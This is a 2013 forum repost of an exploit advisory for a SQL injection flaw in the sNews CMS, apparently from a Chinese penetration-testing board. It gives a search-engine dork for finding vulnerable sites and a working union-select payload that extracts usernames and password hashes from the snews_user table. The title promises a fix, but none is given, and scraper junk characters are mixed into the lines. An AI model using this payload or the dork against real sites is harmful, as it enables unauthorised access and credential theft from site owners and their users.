中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability5 b0 _: T" e# _
作者: By onestree
( P% J. x( l; J+ O' Q7 O下载地址 : http://snewscms.com/( E8 _4 }* q6 Z& Z5 M
测试平台 : ubuntu 12.10 / win 7
' F9 `5 B0 C+ c# G/ F9 L关键词: inurl:"tanyakan pada rumput yang bergoyang"0 r0 j) r: I: R1 m8 n& N- ]5 ?

( R% e; ?* K" S2 h3 s& i7 m  R: l & h/ p, ^& i' N3 m6 ?: C
*************************************************************
# m% f& z+ N3 l* y' A
1 `9 M% T; ^. ZSQL poc:! r2 ^# g5 J1 O8 e/ L  U

6 t$ y8 u: o  l  Yhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
3 [0 [! r/ j- b: ?; f- N
. k; \! U, c; u0 z& P9 j示例
1 X4 v; ]) A2 o4 v7 d
! V/ a- k! }5 N$ {http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*9 A) M: P) o  p

- @/ L- ], m9 A+ S: J, K; V
; M' o1 [. y9 q5 ?) ~! v致谢:  A: d/ w7 I6 _& L" O% V
! H. B: V6 C6 H/ C2 G+ w
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
  {) ~2 x* M& `     ; z" O! J# ^; X: a- ?" G
          indonesiancoder - moeslimh4x0r - go-coder
0 C6 T( e0 B% \$ C4 s+ o
" y& R2 }+ L7 ?% T$ Vspesial my hunny :*7 b$ u: _1 v9 a) j+ ?




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2